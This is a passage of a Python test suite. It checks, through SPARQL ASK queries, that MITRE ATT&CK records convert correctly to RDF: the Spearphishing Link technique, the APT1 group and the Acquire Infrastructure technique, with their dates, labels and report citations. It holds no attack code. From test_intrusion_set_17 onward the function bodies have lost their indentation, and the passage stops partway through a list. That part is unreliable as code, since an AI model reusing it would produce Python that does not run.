    assert bool(qres)


def test_attack_pattern_modifed(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:modified \"2020-10-18T01:53:39.818000+00:00\"^^xsd:dateTime .")
    assert bool(qres)


def test_attack_pattern_rights(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
    assert bool(qres)


def test_attack_pattern_title(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; skos:prefLabel \"Spearphishing Link\" .")
    assert bool(qres)


def test_attack_pattern_references_1(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:references attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac .")
    assert bool(qres)


def test_attack_pattern_references_2(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:references attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f .")
    assert bool(qres)


def test_attack_pattern_references_3(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; dcterms:references attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 .")
    assert bool(qres)


def test_attack_pattern_description(attack_pattern):
    qres = ask(attack_pattern, "?subject a cti:AttackPattern; skos:definition ?description .")
    assert bool(qres)


# ref_1: external reference to CAPEC-163.
def test_ref_1(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource.")
    assert bool(qres)


def test_ref_1_ext_id(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource; core:externalID \"CAPEC-163\".")
    assert bool(qres)


def test_ref_1_refsource(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource; cti:referenceSource \"capec\".")
    assert bool(qres)


def test_ref_1_id(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource; dcterms:identifier \"capec--capec-163\"^^xsd:NMTOKEN.")
    assert bool(qres)


def test_ref_1_source(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_68633290849cc1e088bf2f49788d0f159e24afd60038d6ccaca5adfb977a07ac a dcterms:BibliographicResource; dcterms:source \"https://capec.mitre.org/data/definitions/163.html\"^^xsd:anyURI.")
    assert bool(qres)


# ref_2: external reference to ATT&CK technique T1566.002.
def test_ref_2(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource.")
    assert bool(qres)


def test_ref_2_ext_id(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource; core:externalID \"T1566.002\".")
    assert bool(qres)


def test_ref_2_refsource(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\".")
    assert bool(qres)


def test_ref_2_id(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--t1566.002\"^^xsd:NMTOKEN.")
    assert bool(qres)


def test_ref_2_source(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_adec923c37ebdc6f054399e252eb9e8de7caaded59bf5466ac5242f81857233f a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/techniques/T1566/002\"^^xsd:anyURI.")
    assert bool(qres)


# ref_3: external reference with a full bibliographic citation.
def test_ref_3(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource.")
    assert bool(qres)


def test_ref_3_bib(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.\".")
    assert bool(qres)


def test_ref_3_refsource(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource; cti:referenceSource \"Trend Micro Pawn Storm OAuth 2017\".")
    assert bool(qres)


def test_ref_3_id(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource; dcterms:identifier \"trend-micro-pawn-storm-oauth-2017\"^^xsd:NMTOKEN.")
    assert bool(qres)


def test_ref_3_source(attack_pattern):
    qres = ask(attack_pattern, "attack:ref_e6686c72e4cfda456dd06fa2fb3c02356d1df27fad1542713cc3f9b116420d96 a dcterms:BibliographicResource; dcterms:source \"https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks\"^^xsd:anyURI.")
    assert bool(qres)


# identity--c78cb6e5...: the creating organization (MITRE).
def test_identity(attack_pattern):
    qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .")
    assert bool(qres)


def test_identity_created(attack_pattern):
    qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime.")
    assert bool(qres)


def test_identity_identifier(attack_pattern):
    qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\".")
    assert bool(qres)


def test_identity_modified(attack_pattern):
    qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
    assert bool(qres)


def test_identity_rights(attack_pattern):
    qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.")
    assert bool(qres)


def test_identity_title(attack_pattern):
    qres = ask(attack_pattern, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel \"The MITRE Corporation\" .")
    assert bool(qres)


# marking-definition--fa42a846...: the copyright/rights statement.
def test_marking(attack_pattern):
    qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .")
    assert bool(qres)


def test_marking_rights(attack_pattern):
    qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights \"Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.\" .")
    assert bool(qres)


def test_marking_rights_statement(attack_pattern):
    qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
    assert bool(qres)


def test_marking_creator(attack_pattern):
    qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
    assert bool(qres)


def test_marking_id(attack_pattern):
    qres = ask(attack_pattern, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\" .")
    assert bool(qres)
##
# SPARQL ASK probes against the converted intrusion-set-1.json fixture (APT1).

def test_intrusion_set_0(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet .")
    assert bool(qres)


def test_intrusion_set_1(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:created \"2017-05-31T21:31:47.955000+00:00\"^^xsd:dateTime .")
    assert bool(qres)


def test_intrusion_set_2(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
    assert bool(qres)


def test_intrusion_set_3(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; skos:definition \"[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)\" .")
    assert bool(qres)


def test_intrusion_set_4(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:identifier \"intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662\" .")
    assert bool(qres)


def test_intrusion_set_5(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:modified \"2020-10-22T18:35:55.290000+00:00\"^^xsd:dateTime .")
    assert bool(qres)


# Tests 6-12: one dcterms:references triple per external reference hash.
def test_intrusion_set_6(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b .")
    assert bool(qres)


def test_intrusion_set_7(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 .")
    assert bool(qres)


def test_intrusion_set_8(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8.")
    assert bool(qres)


def test_intrusion_set_9(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 .")
    assert bool(qres)


def test_intrusion_set_10(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb .")
    assert bool(qres)


def test_intrusion_set_11(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 .")
    assert bool(qres)


def test_intrusion_set_12(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:references attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f .")
    assert bool(qres)


def test_intrusion_set_13(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
    assert bool(qres)


def test_intrusion_set_14(intrusion_set):
    qres = ask(intrusion_set, "attack:intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662 a cti:IntrusionSet; skos:prefLabel \"APT1\" .")
    assert bool(qres)


# Tests 15-16: the Mandiant APT1 bibliographic resource itself.
def test_intrusion_set_15(intrusion_set):
    qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource .")
    assert bool(qres)


def test_intrusion_set_16(intrusion_set):
    qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource; cti:referenceSource \"Mandiant APT1\" .")
    assert bool(qres)
def test_intrusion_set_17(intrusion_set):
qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.\" .")
assert bool(qres)
def test_intrusion_set_18(intrusion_set):
qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource; dcterms:identifier \"mandiant-apt1\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_19(intrusion_set):
qres = ask(intrusion_set, "attack:ref_0558bfef1eddacb157bc5a88a175f04d216e2085bbf939e6607cdd971d6ed47b a dcterms:BibliographicResource; dcterms:source \"https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf\"^^xsd:anyURI .")
assert bool(qres)
def test_intrusion_set_20(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_21(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource; cti:referenceSource \"CrowdStrike Putter Panda\" .")
assert bool(qres)
def test_intrusion_set_22(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.\" .")
assert bool(qres)
def test_intrusion_set_23(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource; dcterms:identifier \"crowdstrike-putter-panda\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_24(intrusion_set):
qres = ask(intrusion_set, "attack:ref_26f4364de3ca2f5fc60ee8d1ca65f762a76349c58549a48730b6f85e8870e2b3 a dcterms:BibliographicResource; dcterms:source \"http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf\"^^xsd:anyURI .")
assert bool(qres)
def test_intrusion_set_25(intrusion_set):
qres = ask(intrusion_set, "attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8 a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_26(intrusion_set):
qres = ask(intrusion_set, "attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8 a dcterms:BibliographicResource; cti:referenceSource \"Comment Panda\" .")
assert bool(qres)
def test_intrusion_set_27(intrusion_set):
qres = ask(intrusion_set, "attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"(Citation: CrowdStrike Putter Panda)\" .")
assert bool(qres)
def test_intrusion_set_28(intrusion_set):
qres = ask(intrusion_set, "attack:ref_62d45302b09f01d123c39945b81cc543b5fc4e9140da4dcf2b104c5267aa4ad8 a dcterms:BibliographicResource; dcterms:identifier \"comment-panda\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_29(intrusion_set):
qres = ask(intrusion_set, "attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_30(intrusion_set):
qres = ask(intrusion_set, "attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 a dcterms:BibliographicResource; cti:referenceSource \"Comment Group\" .")
assert bool(qres)
def test_intrusion_set_31(intrusion_set):
qres = ask(intrusion_set, "attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"(Citation: Mandiant APT1)\" .")
assert bool(qres)
def test_intrusion_set_32(intrusion_set):
qres = ask(intrusion_set, "attack:ref_65dd33aa6c6f7c1514b96641e57344ca19f5cd06e50a0689c90b44e88ddf0545 a dcterms:BibliographicResource; dcterms:identifier \"comment-group\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_33(intrusion_set):
qres = ask(intrusion_set, "attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_34(intrusion_set):
qres = ask(intrusion_set, "attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb a dcterms:BibliographicResource; cti:referenceSource \"Comment Crew\" .")
assert bool(qres)
def test_intrusion_set_35(intrusion_set):
qres = ask(intrusion_set, "attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb a dcterms:BibliographicResource; dcterms:bibliographicCitation \"(Citation: Mandiant APT1)\" .")
assert bool(qres)
def test_intrusion_set_36(intrusion_set):
qres = ask(intrusion_set, "attack:ref_760f53abb9bccf4b1f43fef0756d620c65579589e981699462d8233d8e4187bb a dcterms:BibliographicResource; dcterms:identifier \"comment-crew\"^^xsd:NMTOKEN.")
assert bool(qres)
def test_intrusion_set_37(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_38(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource; core:externalID \"G0006\" .")
assert bool(qres)
def test_intrusion_set_39(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\" .")
assert bool(qres)
def test_intrusion_set_40(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--g0006\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_41(intrusion_set):
qres = ask(intrusion_set, "attack:ref_7617d39b304c1ef73796e8c755992fd9f756dc7dd1dede37ecf61a9045a8a9f7 a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/groups/G0006\"^^xsd:anyURI .")
assert bool(qres)
def test_intrusion_set_42(intrusion_set):
qres = ask(intrusion_set, "attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f a dcterms:BibliographicResource .")
assert bool(qres)
def test_intrusion_set_43(intrusion_set):
qres = ask(intrusion_set, "attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f a dcterms:BibliographicResource; cti:referenceSource \"APT1\" .")
assert bool(qres)
def test_intrusion_set_44(intrusion_set):
qres = ask(intrusion_set, "attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f a dcterms:BibliographicResource; dcterms:bibliographicCitation \"(Citation: Mandiant APT1)\" .")
assert bool(qres)
def test_intrusion_set_45(intrusion_set):
qres = ask(intrusion_set, "attack:ref_8c47999bd05fc33de7c7a7f07a4ef43a471173a4a37fba16414a8ce7e07c221f a dcterms:BibliographicResource; dcterms:identifier \"apt1\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_intrusion_set_46(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .")
assert bool(qres)
def test_intrusion_set_47(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_intrusion_set_48(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\" .")
assert bool(qres)
def test_intrusion_set_49(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_intrusion_set_50(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_intrusion_set_51(intrusion_set):
qres = ask(intrusion_set, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel \"The MITRE Corporation\" .")
assert bool(qres)
def test_intrusion_set_52(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .")
assert bool(qres)
def test_intrusion_set_53(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights \"Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.\" .")
assert bool(qres)
def test_intrusion_set_54(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_intrusion_set_55(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_intrusion_set_56(intrusion_set):
qres = ask(intrusion_set, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\" .")
assert bool(qres)
# Expected triples for the "Acquire Infrastructure" attack-pattern fixture.
# Each entry is the graph pattern handed to ask(); this list replaces the
# generated one-function-per-triple tests (test_pre_0..34).
_PRE_TRIPLES = [
    # attack-pattern--0458aab9 (Acquire Infrastructure) core properties
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern .',
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; cti:killChainPhase attack:kill-chain-phase__mitre-attack__resource-development .',
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:created "2020-09-30T16:37:40.271000+00:00"^^xsd:dateTime .',
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .',
    # ?description: only checks that SOME definition literal exists
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; skos:definition ?description .',
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:identifier "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2" .',
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:modified "2020-10-22T17:59:17.606000+00:00"^^xsd:dateTime .',
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:references attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c .',
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:references attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd .',
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .',
    'attack:attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 a cti:AttackPattern; skos:prefLabel "Acquire Infrastructure" .',
    # kill-chain phase resource-development
    'attack:kill-chain-phase__mitre-attack__resource-development a cti:KillChainPhase .',
    'attack:kill-chain-phase__mitre-attack__resource-development a cti:KillChainPhase; cti:killChainName "mitre-attack" .',
    'attack:kill-chain-phase__mitre-attack__resource-development a cti:KillChainPhase; skos:prefLabel "resource-development" .',
    # ref_b2dc9c58... (mitre-attack external reference T1583)
    'attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource .',
    'attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource; core:externalID "T1583" .',
    'attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource; cti:referenceSource "mitre-attack" .',
    'attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource; dcterms:identifier "mitre-attack--t1583"^^xsd:NMTOKEN .',
    'attack:ref_b2dc9c5822dfceab09c60c02ac3e77b2101c14c03ff1152315789dec1e42a22c a dcterms:BibliographicResource; dcterms:source "https://attack.mitre.org/techniques/T1583"^^xsd:anyURI .',
    # ref_ecc45282... (Trend Micro bulletproof-hosting report)
    'attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource .',
    'attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource; cti:referenceSource "TrendmicroHideoutsLease" .',
    'attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource; dcterms:bibliographicCitation "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017." .',
    'attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource; dcterms:identifier "trendmicrohideoutslease"^^xsd:NMTOKEN .',
    'attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource; dcterms:source "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf"^^xsd:anyURI .',
    # identity--c78cb6e5 (The MITRE Corporation)
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created "2017-06-01T00:00:00+00:00"^^xsd:dateTime .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified "2017-06-01T00:00:00+00:00"^^xsd:dateTime .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel "The MITRE Corporation" .',
    # marking-definition--fa42a846 (copyright statement)
    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .',
